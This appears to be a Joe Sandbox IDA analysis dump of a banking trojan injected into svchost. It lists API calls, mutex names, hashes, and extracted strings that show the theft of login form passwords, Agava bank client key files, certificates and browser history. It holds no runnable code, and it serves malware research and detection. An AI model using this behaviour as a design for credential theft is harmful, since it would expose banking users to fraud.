                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashHeapstrstr$AppendProcess$CreateHandleThread$AllocCloseFreeInformationReadValidatememcpymemset
                                                                                                                                                                                                                    • String ID: &ctl00%24MainMenu%24Login1%24Password=$&ctl00%24MainMenu%24Login1%24UserName=$7F1BF8F3$7F1BF93B$7F1BFF41$login=$name_$pass.log$pass_$password=
                                                                                                                                                                                                                    • API String ID: 3712039096-1140291071
                                                                                                                                                                                                                    • Opcode ID: 04d6f07cc634f9f4b2c971c0afa54e9ed0c96637571968c6b731d1860e327f11
                                                                                                                                                                                                                    • Instruction ID: 252726fe71358585feb8e42241803de4c5eb0124164b5c0843582dd19360e73c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04d6f07cc634f9f4b2c971c0afa54e9ed0c96637571968c6b731d1860e327f11
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8818E31E4075467E7129B249C99FEB7BAC9F81745F24C0A5FD4997280EB70E948CBE0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfde3), ref: 02C8E3F8
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(02CCB8D0,00000000), ref: 02C8E439
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8E43F
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8E447
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(02CCB8D0), ref: 02C8E456
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8E45D
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(02CCB8D0,00000000), ref: 02C8E499
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(02CCB8D0), ref: 02C8E4A4
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfde3,?,?), ref: 02C8E4E6
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(02CCB4B0,00000000), ref: 02C8E521
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8E527
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8E52F
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(02CCB4B0), ref: 02C8E53E
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8E545
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(02CCB4B0,00000000), ref: 02C8E573
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8E579
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8E581
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(02CCB4B0), ref: 02C8E590
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8E597
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 02C8E5A1
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8E5D7
                                                                                                                                                                                                                    • SHFileOperationA.SHELL32(?), ref: 02C8E651
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C8E662
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 02C8E673
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8E67A
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8E68C
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8E69C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C8E6AE
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C8E6B1
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C8E6BE
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C8E6C1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$Path$CreateFileHeap$AdminDirectoryFolderMakeSystemUser$AttributesBackslashHandleMutexProcess$CloseDeleteFreeInformationOperationReleaseSleepValidatememset
                                                                                                                                                                                                                    • String ID: 7f1bfde3$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$P0#v$\*.bk$keys\$path.txt
                                                                                                                                                                                                                    • API String ID: 959110331-2830706348
                                                                                                                                                                                                                    • Opcode ID: 9db40ca901118254195b30c4ea7cab12428f95a52a08c20201bb54579ef10ea2
                                                                                                                                                                                                                    • Instruction ID: 6466789fbf7a30f9a499f4654a09d8404d133709c81ab2713913d2c9a38732de
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9db40ca901118254195b30c4ea7cab12428f95a52a08c20201bb54579ef10ea2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A2911870E4468A9FE7129FB4982D7AB7BE8EF89309F148695F845D7301EB30CA05C790
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C76CD0: IsUserAnAdmin.SHELL32 ref: 02C76CDA
                                                                                                                                                                                                                      • Part of subcall function 02C76CD0: memset.MSVCRT ref: 02C76D11
                                                                                                                                                                                                                      • Part of subcall function 02C76CD0: memset.MSVCRT ref: 02C76D29
                                                                                                                                                                                                                      • Part of subcall function 02C76CD0: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,?,?,7622F380), ref: 02C76D4B
                                                                                                                                                                                                                      • Part of subcall function 02C76CD0: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,?,00000104,?,?,?,?,7622F380), ref: 02C76D71
                                                                                                                                                                                                                      • Part of subcall function 02C76CD0: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,7622F380), ref: 02C76DFD
                                                                                                                                                                                                                      • Part of subcall function 02C76CD0: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,7622F380), ref: 02C76E04
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02C77155
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C77162
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02C77174
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C7717D
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C77195
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C771A7
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,80F500FDa,80f5007ca), ref: 02C771B2
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C771B5
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C771C2
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C771C5
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,80F500FDa,80f5007ca), ref: 02C771D2
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C771D5
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C771E2
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C771E5
                                                                                                                                                                                                                    • SetCaretBlinkTime.USER32(000000FF), ref: 02C771F7
                                                                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 02C77225
                                                                                                                                                                                                                    • StrToIntA.SHLWAPI(00000000,80F500FDa,80f5007ca), ref: 02C77255
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,80F500FDa,80f5007ca), ref: 02C77265
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C77268
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C77275
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C77278
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,80F500FDa,80f5007ca), ref: 02C77285
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C77288
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C77295
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C77298
                                                                                                                                                                                                                    • Sleep.KERNEL32(00001388,80F500FDa,80f5007ca), ref: 02C772A3
                                                                                                                                                                                                                    • closesocket.WS2_32(?), ref: 02C772D5
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?), ref: 02C772F5
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C7730D
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C7731F
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C77342
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C7735C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$Free$HandleMutexValidate$OpenSleep$CloseInformationReleasememset$AdminAllocBlinkCaretQueryTimeUserValueclosesocket
                                                                                                                                                                                                                    • String ID: 80F500FDa$80f5007ca$Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}$P0#v
                                                                                                                                                                                                                    • API String ID: 2871222221-3176857679
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8B27F
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8B2B7
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C8B2F7
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8B301
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8B309
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8B31A
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8B321
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,crypto), ref: 02C8B333
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,self.cer), ref: 02C8B346
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,self.pub), ref: 02C8B357
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C8B3A2
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 02C8B3AF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorFileLastPath$AdminAttributesBackslashCreateDeleteDirectoryFolderMakeSystemUsermemset
                                                                                                                                                                                                                    • String ID: 7F1BFC0D$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$P0#v$crypto$keys.zip$path.txt$self.cer$self.pub
                                                                                                                                                                                                                    • API String ID: 3980609930-47090278
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C92B23
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C92B36
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C92B49
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92B77
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92BAD
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,02CCAFC0), ref: 02C92BC2
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C92BCC
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C92BD4
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92BE5
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C92BEC
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 02C92BF9
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C92C2C
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(02CCAFC0), ref: 02C92C57
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C92C91
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C92C9B
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C92CA3
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92CB4
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C92CBB
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 02C92CC8
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214},02C8753A,02C8753B), ref: 02C92CFE
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 02C92D0F
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C92D16
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,02C8753A), ref: 02C92D28
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C92D39
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$DirectoryErrorLaststrstr$BackslashCreate$AdminCurrentFolderHandleMakeMutexSystemUser$CloseInformationReleaseSleep
                                                                                                                                                                                                                    • String ID: IDToken1=$IDToken2=$Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}$P0#v$YotaConfirmForm%5Bpassword%5D$login.yota.ru$pass.txt$pass2.txt
                                                                                                                                                                                                                    • API String ID: 1263884631-1922424858
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(?,76232F00,00000000,76230F00), ref: 02C75405
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C7543F
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 02C7544C
                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C7546B
                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,00000022,00000000,00000000,?), ref: 02C7548C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,02C82665,00000001), ref: 02C7550B
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7550E
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7551B
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7551E
                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02C75533
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$FilePath$FolderProcess$AttributesBackslashCreateDeleteFreeValidate
                                                                                                                                                                                                                    • String ID: \History.IE5\index.dat$\Opera\Opera\global_history.dat$\Opera\Opera\typed_history.xml$http$http$http$links.log
                                                                                                                                                                                                                    • API String ID: 772302041-762728116
                                                                                                                                                                                                                    • Opcode ID: a3472fe0c7af3a7a90eb6693d0528da1f65fd5715031649f65d91ef3466f12b1
                                                                                                                                                                                                                    • Instruction ID: 22586ef335f1538914494fa27962e674e6c067f21e5578ca48d3104f23decb94
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3472fe0c7af3a7a90eb6693d0528da1f65fd5715031649f65d91ef3466f12b1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B913B70E40359ABDB22CF60DC84FEABBB9EF44744F844584E945AB180DB70AB45CB90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: malloc$free$fclosefopenfreadsprintf$callocfseekrealloc
                                                                                                                                                                                                                    • String ID: %s.DBF$%s.dbf$7f1bf8b2$r+b$rb+
                                                                                                                                                                                                                    • API String ID: 3942648141-3192437867
                                                                                                                                                                                                                    • Opcode ID: 564d86793eb1186b01d6d2885932206889d53179d3c9400a760a3b6f8322c1f8
                                                                                                                                                                                                                    • Instruction ID: ad5fb03736374132df973ddc7ff881cc1540fac488caea9b5d691a9763841805
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 564d86793eb1186b01d6d2885932206889d53179d3c9400a760a3b6f8322c1f8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44D11EB19042D55FC7125F3D8C94776BFEAAF86208F2886A8E895C7342E733D609C750
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: P0#v$open$taskmgr
                                                                                                                                                                                                                    • API String ID: 0-2917657181
                                                                                                                                                                                                                    • Opcode ID: b7e6082617a72ea4ac1b231db91d193152cf0d342a2d59c8e298340c67ce67c6
                                                                                                                                                                                                                    • Instruction ID: c90015fce84a43227881360fce1100c2b29f9ed26db122529d9413665eac2634
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7e6082617a72ea4ac1b231db91d193152cf0d342a2d59c8e298340c67ce67c6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B91C431A80284EBD712DF69ED49FABBB7CEBC5711F104B95F90597281C730A961CBA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C93170: memset.MSVCRT ref: 02C93194
                                                                                                                                                                                                                      • Part of subcall function 02C93170: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C9319F
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,Agava_Client.exe), ref: 02C91BC6
                                                                                                                                                                                                                    • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 02C91BE5
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91BF7
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C91C08
                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(Containers,UseToken,00000000,?,00000104,?), ref: 02C91C50
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C91C64
                                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(Containers,KeysDiskPath,00000000,?,00000104,?), ref: 02C91CA4
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C91CB2
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C91CC7
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 02C91D64
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf95c), ref: 02C91D9D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strstr$HandlePrivateProfileString$BackslashCloseCreateCurrentDirectoryFileInformationModuleNameOpenPathProcessSnapshotToolhelp32memset
                                                                                                                                                                                                                    • String ID: .ini$7f1bf95c$Agava_Client.exe$Agava_Client.ini$Agava_keys$Containers$KeysDiskPath$Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$P0#v$UseToken$keys.zip$keys_path.txt
                                                                                                                                                                                                                    • API String ID: 2651364649-292714684
                                                                                                                                                                                                                    • Opcode ID: 571e122fc8df3b38df1a959031803ecffd07d5f7d0d989ff883e76ae471477e2
                                                                                                                                                                                                                    • Instruction ID: 8530997ed578a2fdf82a443dd6cfe597021f2c815232704f86ca57ebae2b196d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 571e122fc8df3b38df1a959031803ecffd07d5f7d0d989ff883e76ae471477e2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15A1193194429E8FDF17CB249C5DBEA7BE9EF45300F1846E4E949D7240EBB19A48CB90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfc59), ref: 02C89F18
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(02CCB9D8,00000000), ref: 02C89F58
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C89F5E
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C89F66
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(02CCB9D8), ref: 02C89F75
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C89F7C
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(02CCB9D8,00000000), ref: 02C89FB1
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(02CCB9D8), ref: 02C89FBC
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfc59,00000000,00000001), ref: 02C8A006
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashErrorFileLast$AdminAttributesCreateDeleteDirectoryFolderMakeSystemUser
                                                                                                                                                                                                                    • String ID: 7f1bfc59$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0#v$path.txt
                                                                                                                                                                                                                    • API String ID: 2920098687-2492803057
                                                                                                                                                                                                                    • Opcode ID: dc09b160e95cc9d1a8e2520c945cc2bb42e4f49a67d8cfef1e0e84e47db0705f
                                                                                                                                                                                                                    • Instruction ID: e060a6dc4a62d9af18e8e24f33a177b5cb2f0831524c4b233497ef898910154f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc09b160e95cc9d1a8e2520c945cc2bb42e4f49a67d8cfef1e0e84e47db0705f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74614431A406819FE7165B749C59B7B3BE8AF8974AF188699FC87CB341CB71CA04C790
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfc59), ref: 02C89F18
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(02CCB9D8,00000000), ref: 02C89F58
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C89F5E
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C89F66
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(02CCB9D8), ref: 02C89F75
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C89F7C
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(02CCB9D8,00000000), ref: 02C89FB1
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(02CCB9D8), ref: 02C89FBC
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfc59,00000000,00000001), ref: 02C8A006
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashErrorFileLast$AdminAttributesCreateDeleteDirectoryFolderMakeSystemUser
                                                                                                                                                                                                                    • String ID: 7f1bfc59$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0#v$path.txt
